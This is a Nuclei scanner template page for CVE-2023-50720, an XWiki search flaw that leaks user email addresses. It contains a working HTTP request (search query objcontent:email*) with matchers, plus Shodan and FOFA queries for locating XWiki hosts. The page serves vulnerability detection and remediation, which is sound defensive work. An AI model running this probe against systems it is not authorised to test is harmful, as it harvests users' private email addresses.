Skip to content
Nuclei Templates

XWiki < 4.10.15 - Email Disclosure

ID: CVE-2023-50720

Severity: medium

Author: ritikchaddha

Tags: cve,cve2024,xwiki,email,exposure

Description

Section titled “Description”

The Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for objcontent:email* using XWiki’s regular search interface.

YAML Source

Section titled “YAML Source”
id: CVE-2023-50720


info:
  name: XWiki < 4.10.15 - Email Disclosure
  author: ritikchaddha
  severity: medium
  description: |
    The Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for objcontent:email* using XWiki's regular search interface.
  impact: |
    Successful exploitation could lead to disclosure of the email of all the users.
  remediation: |
    This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-20371
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50720
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-50720
    cwe-id: CWE-200
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2024,xwiki,email,exposure


http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*"
      - "{{BaseURL}}/xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*"


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "email</span> :"
          - "XWiki.XWikiUsers[0]"
          - "email_checked</span>"
        condition: and


      - type: status
        status:
          - 200
# digest: 4b0a004830460221008b5cc1f2001f716d0a0f6ef2926227de9a76a63990e9338b85e9d544d2766f55022100ca29f42ab23e6fdae7bbacf62b46781887f3aa3d64935bc1b56607d5352e0ff3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-50720.yaml"

View on Github